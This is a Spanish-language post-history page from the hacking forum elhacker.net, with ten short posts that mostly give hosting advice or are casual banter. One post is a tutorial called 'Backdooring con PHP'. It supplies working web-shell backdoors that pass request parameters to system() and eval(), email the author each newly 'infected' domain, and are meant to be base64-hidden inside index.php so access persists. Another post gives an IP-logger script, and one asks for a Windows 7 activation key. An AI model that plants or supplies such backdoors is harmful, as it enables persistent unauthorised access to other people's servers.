elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


  Mostrar Mensajes
Páginas: [1] 2 3 4
1  Sistemas Operativos / Windows / ¿Alguna clave de activación Windows 7? en: 5 Agosto 2015, 11:04 am
Hola, pues mi serial de activación de windows ha caducado, uso Windows 7 y queria saber si podrían proporcionarme una clave de activación del producto..

Un saludo
2  Programación / Desarrollo Web / Re: Mi foro no para de caer.. en: 28 Junio 2015, 14:50 pm
No se si te acuerdas de foropeke.
Ya tengo comprado el .net lo de crear yo mismo el servidor nose preferiria tener un buen hosting.
Ah si, ando registrado si mal no recuerdo.. Pues te recomendaría montarlo tu mismo en xampp o algo, ya que los hostings gratuitos de ahora están echos todos una porquería y el servicio da verguenza.

Yo mismo he intentado crear proyectos en hostings gratuitos y al dia siguiente se me llenaba de problemas con la base de datos o con la web en general.

Citar
Ahora voi a contactar con ellos, esque dije de esperarme un tiempo a ver si iba a ser porque me pasaba el dia modificando el foro y por lo que fuera caia, pero ya veo que no xd. Gracias.
Modificar el foro es algo normál, todo el mundo lo hace, también puedes haber instalado algún mod que te haya dañado la plantilla principal del foro, revisa Themes/NOMBREDELTHEME/index.php

Si no ves algo fuera de lo normál, es el servidor de nixiweb
3  Programación / Desarrollo Web / Re: Mi foro no para de caer.. en: 28 Junio 2015, 14:39 pm
Veo que usas nixiweb, el plan gratuito, obviamente si usas un host malo y hay miles de hosts creados en el servidor de ese host, tu página va a caer y más si es hosting gratuito.

Te recomiendo que tu mismo creés un servidor local y montes ahí tu foro, o compres un hosting bueno que tenga buen servicio técnico.

PD: Otra cosa, ¿De qué trata el foro?

¡Un saludo!
4  Seguridad Informática / Seguridad / Re: Como puedo arreglar vulnerabilidades en linux? en: 28 Junio 2015, 13:55 pm
Las "vulnerabilidades" de Ubuntu no las arreglas tú, automáticamente la comunidad de Ubuntu se encarga de fixear todo, como bien dijo @gck

Tu mismo puedes reportar el error, siempre y cuando sepas que no estén informados de él.
5  Foros Generales / Foro Libre / Re: ¿Es infantil ver una película en tu primera cita? en: 28 Junio 2015, 13:50 pm
Aprovecha del alcohol y píllate un ciego, sal de su casa con un perro labrador, un palo y gafas de sol @Dimitrix , al siguiente dia no te acordarás de nada!!

Jajajaj suerte con la chica!!
6  Seguridad Informática / Hacking / Re: Ask.fm en: 18 Junio 2015, 18:29 pm
Nadie bloquea las preguntas anónimas por el morbo que da.
Sisi, da un morbo que la gente te insulte, flipante. Es como dejar la puerta abierta.. te arriesgas a que alguien entre.  :rolleyes:
7  Foros Generales / Foro Libre / Re: ¿Quién es tu sensei? en: 18 Junio 2015, 18:16 pm
Yo he notado algunos cuyos comentarios me han dejado en plan: ¿Y Esto lo ha escrito una persona?

Entre ellos WHK, AERCREA, ANELKAOS, Antrax, engel lex & Elektro.
8  Foros Generales / Foro Libre / Re: 03:33 am, la hora del Tiempo Muerto en: 15 Junio 2015, 15:41 pm
Se supone que los informáticos somos lógicos(gracias a todos los años que llevamos programando) pero viendo el Foro Libre, me estoy planteando si aquí hay informáticos o seguidores de Iker Jimenez ..

En fin.. cuando esté despierto y sean las 3:33 os aviso si me absorbe una lechuza extraterrestre
Jajaja anda que te vá a faltar razon, si que parecen seguidores de Iker Jiménez JAJAJAJAJ

Llevo toda mi vida pasando por las 03:33 am y nunca pasó nada  :silbar:
9  Seguridad Informática / Hacking / Backdooring con PHP. en: 14 Junio 2015, 12:40 pm
Hola internautas, en este post hablaré sobre técnicas para tener un archivo ya sea .PHP ó .HTML a nuestro control. No me hago responsable sobre el uso que le den a este post. Solo lo hago por cuestiones educativas y éticas.

Para el que no sepa que es un Backdoor, cito a mi amiga la Wikipedia.
Citar
una puerta trasera (o en inglés backdoor), en un sistema informático es una secuencia especial dentro del código de programación, mediante la cual se pueden evitar los sistemas de seguridad del algoritmo (autentificación) para acceder al sistema.

Temario de funciones
1-System()
2-Variable Global $_SERVER[]
2.1- $_SERVER['REMOTE_ADDR']
2.2-$_SERVER['PHP_SELF']
2.3-$_SERVER['SERVER_NAME']
3-mail()
4-eval()

System()
No dudo que ya conozcas está función ya que es la más conocida para estos temas.

Para poder usarla solo debemos declarar:
Citar
Código
  1. <?php
  2. system('comando');
  3. ?>
¿Y si se nos ocurre usar $_GET o $_POST para poder ejecutar el comando que queramos?
Citar
Código
  1. <?php
  2. $var = @system($_GET['ejec']);
  3. ?>

Podriamos entrar desde:
Citar
url.com/archivoinfectado.php?ejec=comando

un ejemplo así:
Citar
url.com/archivoinfectado.php?ejec=cat /etc/passwd
y nos mostraría el etc/passwd o podemos poner con cualquier comando, depende el servidor
dependeran los comandos, es decir si tiene linux son comandos linux y si tiene windows pues son
comandos windows, :genius:

Si no están 100% familiarizados con linux les dejo unos comandos que podrian servirles:
Mover un archivo: mv archivo /carpeta/
Renombrar un archivo: mv archivo archivorenombrado
Crear un archivo: touch archivo
Descargar archivos: wget url.com/lol.txt (Se descargará un archivo lol.txt)
Eliminar un archivo: rm archivo
Copiar un archivo: cp archivo archivocopiado

Variable global $_SERVER
$_SERVER['REMOTE_ADDR'] – Muestra la ip de el usuario que está abriendo el script

Ejemplo:
Citar
Código
  1. <?php
  2. echo 'tu IP es'.$_SERVER['REMOTE_ADDR'];
  3. ?>

Mostrará la IP de quien lo abra.
$_SERVER['PHP_SELF']- Muestra la ruta en el que se está ejecutando el script.

Ejemplo:
Citar
Código
  1. <?php
  2. echo 'Este archivo esta en'.$_SERVER['PHP_SELF'];
  3. ?>

Mostrará la ruta de el script, es decir si estamos en web.com/hola/lol.php te mostrara /hola/lol.php
$_SERVER['SERVER_NAME'] – Muestra el dominio en el que se está ejecutando el script.

Ejemplo:
Citar
Código
  1. <?php
  2. echo 'Estamos en el dominio '.$_SERVER['SERVER_NAME'];
  3. ?>

Te mostrará en la pantalla Estamos en el dominio http://web.com


Mail()
Está función sirve para enviar un mail.

Modo de uso:
mail('Para', 'Asunto', 'Contenido')
NOTA: Esto se puede almacenar en variables pero como he dicho no estoy enseñando a programar PHP.

Entonces si yo pongo en un script:
Citar
Código
  1. <?php
  2. mail('elhacker@outlook.es', 'Hola', 'Hola mucho gusto soy'.$_SERVER['REMOTE_ADDR);
  3. ?>
Al momento de que alguen entre me enviara un email con el asunto Hola y con el contenido “Hola
mucho gusto soy y una IP”.

Bueno ya lo que sigue es a su imaginación, lo que deseen hacer.

eval()
Bien, ahora les explicaré está función. Eval es parecida a system con la diferencia en que system ejecuta comandos en el sistema y eval ejecuta código PHP.

Un claro ejemplo de uso.
Citar
Código
  1. <?php
  2. $var = eval(echo 'hola elhacker';);
  3. ?>
Si lo ejecutamos veremos que nos mostrará: hola elhacker. Al igual que system() la podemos usar con $_GET ó $_POST de la misma forma.

Ejemplo:
Citar
Código
  1. <?php
  2. $var eval($_GET['ejec']);
  3. ?>

lo usamos de está forma:
Citar
url.com/archivoinfectado.php?ejec=echo 'hola';
y miren que claramente nos ejecutará hola.
Bueno si no están muy familiarizados con PHP está ultima función no les ayudará tanto (y si ponen el code de una shell).

Creando nuestros backdoors.
Un backdoor que ejecute comandos en un sistema pero que nos avise por email cuando alguiien haya visitado este script.
Citar
Código
  1. <?php
  2. $var = system($_POST['ejec');
  3. $domain = $_SERVER['SERVER_NAME'];
  4. $ruta = $_SERVER['PHP_SELF'];
  5. mail('elhacker@gmail.com', 'Nuevo dominio infectado', $domain.$ruta);
  6. ?>

Son 4 lineas que podemos incluir en cualquier script, si ponemos estas 4 lineas dentro de una shell y despues ciframos todo en base64... ¿Quíen se dará cuenta? O también podemos incluir estas lineas digamos en el archivo index.php, asi si nos borran una shell seguimos teniendo acceso al servidor.
Citar
Código
  1. <?php
  2. $var = eval($_POST['ejec');
  3. $domain = $_SERVER['SERVER_NAME'];
  4. $ruta = $_SERVER['PHP_SELF'];
  5. mail('elhacker@gmail.com', 'Nuevo dominio infectado', $domain.$ruta);
  6. ?>

Bueno hay muchas, muchas formas de darle provecho a estas funciones, Yo solo explique dos.
Usen la imaginación.

Saludos, Payasako.
10  Seguridad Informática / Bugs y Exploits / Re: Virus pagina web IP en: 12 Junio 2015, 16:23 pm
Puedes crear un host gratuito.. con un Iplogger en php, si entra 1 persona se almacenará su ip en http://pepitoflauta.com/logfile.htm

Código
  1. <?php
  2.  
  3. function logIP()
  4. {  
  5.     $ipLog="logfile.htm"; // Your logfiles name here (.txt or .html extensions ok)
  6.  
  7.     // IP logging function by Dave Lauderdale
  8.     // Originally published at: www.digi-dl.com
  9.  
  10.     $register_globals = (bool) ini_get('register_gobals');
  11.     if ($register_globals) $ip = getenv(REMOTE_ADDR);
  12.     else $ip = $_SERVER['REMOTE_ADDR'];
  13.  
  14.     $date=date ("l dS of F Y h:i:s A");
  15.     $log=fopen("$ipLog", "a+");
  16.  
  17.     if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))  
  18.     {
  19.          fputs($log, "Logged IP address: $ip - Date logged: $date<br>");
  20.     }
  21.     else fputs($log, "Logged IP address: $ip - Date logged: $date\n");
  22.  
  23.     fclose($log);
  24. }
  25. // Place the below function call wherever you want the script to fire.
  26. logIp();
  27.  
  28.  
  29. ?>

Puedes cambiar el nombre del archivo de logfile.htm por accesos.php o como quieras..
Páginas: [1] 2 3 4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines